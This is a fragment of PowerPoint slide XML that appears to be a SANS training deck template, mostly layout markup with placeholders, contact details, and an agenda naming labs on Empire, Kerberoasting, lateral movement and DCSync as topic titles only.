                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF9CA734-87F3-E52D-9E3C-D5F3499B9FF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noMove="1" noResize="1" noEditPoints="1" noAdjustHandles="1" noChangeArrowheads="1" noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="16" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="560388" y="5015705"/>
            <a:ext cx="11369342" cy="411163"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1600" b="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="342900" indent="0">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1600">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="571500" indent="0">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1600">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="800100" indent="0">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1600">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="490050" indent="0">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1600">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to enter course name</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{753F7C5C-86B8-CAE8-0F72-A9ADE3524093}"/>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8BFC74C5-5C97-A8C8-9520-DF516ADE0B0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8930CD57-85B0-F3D3-20A7-C4D834BB978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AA1270C4-FBAD-0727-4E08-8F541B69F60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4195697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2" name="Content Placeholder 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15AAB178-DE9C-8305-25C5-213BF0637562}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="20"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428625" y="1233489"/>
            <a:ext cx="11334750" cy="2443162"/>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DC4E7898-5ED7-D16B-9F6D-A5B91D81884E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="21"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428625" y="3858305"/>
            <a:ext cx="11334750" cy="2847294"/>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3563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61315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except for head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026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and Resources">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TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3FAC4AC-C72B-1C3D-9625-C5BF17198D2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333374" y="2578541"/>
            <a:ext cx="11176285" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5400" b="1" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Contacts and Resources</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D55DB56-0BF8-F755-C6BE-D0C7598D4119}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8658225" y="439008"/>
            <a:ext cx="3310968" cy="1708160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>General inquiries: info@sans.org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Registration: registration@sans.org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Tuition: tuition@sans.org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Press: press@sans.org</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500" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>301-654-SANS (7267)</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500" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CEE52BDE-E7CB-45D7-D28D-002B96724FC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="100"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333374" y="5197021"/>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3" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A081448-FB84-A17D-8487-EC9BA42B8E66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="101"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333374"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6" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1791648-2F59-B815-B425-3CDE57567A11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="104" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3267075" y="4521204"/>
            <a:ext cx="2819402"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AUTHOR</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5DC3011-CB45-A6F5-7349-9DBFA471393F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="105"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3267075" y="4853673"/>
            <a:ext cx="2819402"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8" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37B7B33D-0359-8E32-726E-ACC94C2B20E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="106"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3267074" y="5206325"/>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19" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E5AB6ED-6584-A588-BBCE-BE150A179C0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="107"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3267074" y="5556173"/>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2" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{617FBEDE-06DF-3D07-FD2C-6FACEA7FFD7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="110" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6200773" y="4511900"/>
            <a:ext cx="4537565" cy="323165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="54000" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="1500" b="1"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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>RESOURCES</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06B08F70-68CF-5A5E-9C71-1F6A510C3E0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="111"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6200774" y="4844368"/>
            <a:ext cx="4537564"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4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B762A79C-1CDE-08BC-D383-DF91C190C761}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="112"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6200773" y="5197021"/>
            <a:ext cx="4537567"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5" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{353C443F-4A1B-2AE3-7DA3-F0A78F6F1CFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="113"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6200773" y="5546869"/>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35" name="TextBox 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D06C698-1DCB-0757-D9F5-FF35708BC35A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304799" y="4521204"/>
            <a:ext cx="2819402" cy="323165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" spc="150" baseline="0" dirty="0"/>
              <a:t>AUTHOR</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F1D8E2F-247B-2481-1E2C-96CB8C4E56C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="122"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333373" y="4853672"/>
            <a:ext cx="2819403" cy="323165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="54000" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="1500" b="0" cap="none" spc="150" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="1000" b="0" cap="all" spc="150" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="1000" b="0" cap="all" spc="150" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="1000" b="0" cap="all" spc="150" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="1000" b="0" cap="all" spc="150" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="1000" b="0" cap="all" spc="150" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="1000" b="0" cap="all" spc="150" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="1000" b="0" cap="all" spc="150" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="1000" b="0" cap="all" spc="150" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{744AEA6C-912B-E16D-0D8E-DB211C6686F8}"/>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49CEDB62-60F0-F852-B41A-3A3B01A87A5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7" name="Straight Connector 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C2731F9-FBA9-F53D-126E-D373D1A7B1C2}"/>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8" name="Picture 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37250361-FC7B-2A6B-C47B-3CBFABB0514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918694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ll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21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Agenda">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9BB29-8C87-6D41-82E9-E70E858D3C1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2" y="0"/>
            <a:ext cx="12191998" cy="299803"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F5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AAD72331-F130-7A71-E8A1-7C479B63445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7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F838C5D7-39C1-D190-C949-B84C57FE3B01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4160189" y="728295"/>
            <a:ext cx="7330419" cy="5133713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="en-US"/>
            </a:defPPr>
            <a:lvl1pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="3600" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2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Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3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3pPr>
            <a:lvl4pPr marL="857250" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr lang="en-US" sz="1800" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="490050" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr lang="en-US" sz="2100" b="0" kern="120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a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="0" noProof="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Lab 1: Environment Preparation and spinning up</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" sz="2600" b="0" noProof="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="0" kern="1200" noProof="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Lecture : Intro to AD and Empire</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" sz="26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2600" b="0" kern="1200" noProof="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Lab 2: Initial Empire Setup and Agent Callback</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" sz="2600" b="0" noProof="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="0" kern="1200" noProof="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Lecture : Intro to Kerberos and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="0" kern="1200" noProof="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Kerberoasting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="26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endParaRPr lang="en-US" sz="26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r>
              <a:rPr lang="en-US" sz="2600" b="0" kern="1200" noProof="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Lab 3: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="0" kern="1200" noProof="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Kerberoasting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="0" kern="1200" noProof="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>, lateral movement and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="0" kern="1200" noProof="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>DCSync</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="26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endParaRPr lang="en-US" sz="26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r>
              <a:rPr lang="en-US" sz="2600" b="0" kern="1200" noProof="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
